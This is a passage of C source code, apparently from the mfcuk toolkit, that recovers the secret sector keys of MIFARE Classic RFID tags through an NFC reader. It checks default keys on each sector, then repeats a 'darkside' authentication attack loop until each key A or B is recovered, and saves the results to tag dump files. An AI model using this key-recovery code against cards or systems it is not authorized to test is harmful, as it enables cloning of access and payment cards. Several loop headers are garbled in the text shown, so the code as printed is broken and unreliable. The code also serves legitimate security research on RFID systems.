ERR("AUTH sector %d, block %d, key %012"PRIx64", key-type 0x%02x, error code 0x%02x", i, block, crntVerifKey, k, uiErrCode);
} else {
// Mark current key-type as verified
ptr_trailer->abtAccessBits[result_byte] |= ACTIONS_VERIFY;
// Copy default key on top of dump only in case default keys option was specified in command line and the default key matched
memcpy((k == keyA) ? (ptr_trailer->abtKeyA) : (ptr_trailer->abtKeyB), current_default_keys[j], MIFARE_CLASSIC_KEY_BYTELENGTH);
}
} // for (j = 0; (j < crntNumVerifKeys); j++)
} // for (i=0; i 0)) {
print_mifare_classic_tag_actions("\n\nACTION RESULTS MATRIX AFTER VERIFY", &(tag_recover_verify.tag_basic));
}
// RECOVER KEYS CODE-BLOCK
printf("\nRECOVER: ");
for (i = 0; i < max_sectors; i++) {
uint64_t crntRecovKey = 0;
ui64KeyRecovered = 0;
block = get_trailer_block_for_sector(MIFARE_CLASSIC_4K, i);
ptr_trailer = (mifare_classic_block_trailer *)((char *)(&tag_recover_verify.tag_basic) + (block * MIFARE_CLASSIC_BYTES_PER_BLOCK));
printf(" %x", i);
fflush(stdout);
for (j = keyA; j <= keyB; j++) {
// Depending on which of keyA or keyB the j value is, the checks and actions below will address exactly that keyA or keyB of current sector
uint8_t action_byte = ACTIONS_KEY_A + 2 * (1 - (keyB - j));
uint8_t result_byte = RESULTS_KEY_A + 2 * (1 - (keyB - j));
// We have a sector and a key-type of that sector marked for recovery and still the key was not either verified nor recovered
if ((ptr_trailer->abtAccessBits[action_byte] & ACTIONS_RECOVER) &&
!(ptr_trailer->abtAccessBits[result_byte] & ACTIONS_VERIFY) &&
!(ptr_trailer->abtAccessBits[result_byte] & ACTIONS_RECOVER)
) {
// TODO: think of proper mechanism. this is temporary workaround in cases when reader hangs
mfcuk_save_tag_dump("./snapshot.mfd", &(tag_recover_verify.tag_basic));
// TEST
// Before starting a new recovery session, disconnect and reconnect to reader and then tag
nfc_close(pnd);
// Try to open the NFC reader
pnd = nfc_open(context, NULL);
if (pnd == NULL) {
ERR("connecting to NFC reader");
return EXIT_FAILURE;
}
if (0 > nfc_initiator_init(pnd)) {
ERR("initializing NFC reader: %s", nfc_device_get_name(pnd));
goto error;
}
// TEST
// Every new recovery session needs this "sort-of" initializing the entries
memset((void *)arrSpoofEntries, 0, sizeof(arrSpoofEntries));
numSpoofEntries = 0;
numAuthAttempts = 0;
// Recovery loop for current key-type of current sector
do {
mfcuk_darkside_select_tag(pnd, iSleepAtFieldOFF, iSleepAfterFieldON, &ti.nti);
// Print usefull/useless info (sort-of "Let me entertain you!")
log_progress(tag_recover_verify.uid, tag_recover_verify.type,
crntRecovKey, block, numSpoofEntries, numAuthAttempts);
if (bfOpts['v'] && (verboseLevel > 3)) {
printf("\n-----------------------------------------------------\n");
printf("Let me entertain you!\n");
printf(" uid: %08x\n", tag_recover_verify.uid);
printf(" type: %02x\n", tag_recover_verify.type);
printf(" key: %012"PRIx64"\n", crntRecovKey);
printf(" block: %02x\n", block);
printf("diff Nt: %d\n", numSpoofEntries);
printf(" auths: %d\n", numAuthAttempts);
printf("-----------------------------------------------------\n");
}
uiErrCode = mfcuk_key_recovery_block(pnd, tag_recover_verify.uid, crntRecovKey, j, tag_recover_verify.type, block, &ui64KeyRecovered);
if (uiErrCode != MFCUK_OK_KEY_RECOVERED && uiErrCode != MFCUK_SUCCESS && uiErrCode != MFCUK_FAIL_AUTH) {
ERR("mfcuk_key_recovery_block() (error code=0x%02x)", uiErrCode);
}
mfcuk_darkside_reset_advanced(pnd);
numAuthAttempts++;
} while (uiErrCode != MFCUK_OK_KEY_RECOVERED);
// Store the recovered key A and mark key A for this sector as recovered in results
ptr_trailer->abtAccessBits[result_byte] |= ACTIONS_RECOVER;
if (!mfcuk_key_uint64_to_arr(&ui64KeyRecovered, (j == keyA) ? (&(ptr_trailer->abtKeyA[0])) : (&(ptr_trailer->abtKeyB[0])))) {
WARN("mfcuk_key_uint64_to_arr() failed, recovered key should have been %012"PRIx64"", ui64KeyRecovered);
}
}
} // for (j=keyA; j<=keyB; j++)
}
printf("\n");
if (bfOpts['v'] && (verboseLevel > 0)) {
print_mifare_classic_tag_actions("\n\nACTION RESULTS MATRIX AFTER RECOVER", &(tag_recover_verify.tag_basic));
}
// DUMP DATA CODE-BLOCK
// TODO: write this code-block
/*
for (i=0; i 1)) {
printf("INFO: saved tag dump file to '%s'\n", strOutputFilename);
}
}
} else if (bfOpts['O']) {
if (!mfcuk_save_tag_dump_ext(strOutputFilename, &(tag_recover_verify))) {
ERR("could not save extended tag dump to '%s'", strOutputFilename);
} else {
if (bfOpts['v'] && (verboseLevel > 1)) {
printf("INFO: saved extended tag dump file to '%s'\n", strOutputFilename);
}
}
}
return EXIT_SUCCESS;
error:
nfc_close(pnd);
nfc_exit(context);
return EXIT_FAILURE;
}